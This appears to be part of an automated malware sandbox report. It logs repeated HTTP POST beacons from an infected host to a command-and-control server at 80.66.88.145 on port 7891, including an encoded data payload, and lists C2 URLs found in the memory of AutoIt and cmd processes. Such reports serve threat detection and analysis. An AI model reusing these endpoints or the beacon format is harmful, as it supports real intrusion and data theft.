            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 64Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
            Source: global trafficTCP traffic: 192.168.2.4:49690 -> 80.66.88.145:7891
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: unknownTCP traffic detected without corresponding DNS query: 80.66.88.145
            Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.
            Source: cmd.exe, 0000000E.00000002.708417301.000000000517B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145
            Source: Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145&
            Source: cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145:7891
            Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145:9999
            Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145:9999d
            Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145:9999hd
            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145:9999l
            Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145:9999n
            Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145:9999pT$
            Source: cmd.exe, 00000009.00000002.616707929.0000000005B00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://80.66.88.145:9999x
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000000.557064508.0000000000A49000.00000002.00000001.01000000.00000007.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000000.589433696.0000000000F59000.00000002.00000001.01000000.0000000B.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: OLicenseHeartbeat.exe, 0000000C.00000002.812170962.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.comh
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
            Source: unknownHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 658Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 68 43 25 32 42 44 66 5a 68 53 30 38 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfhC%2BDfZhS08nz&act=1000
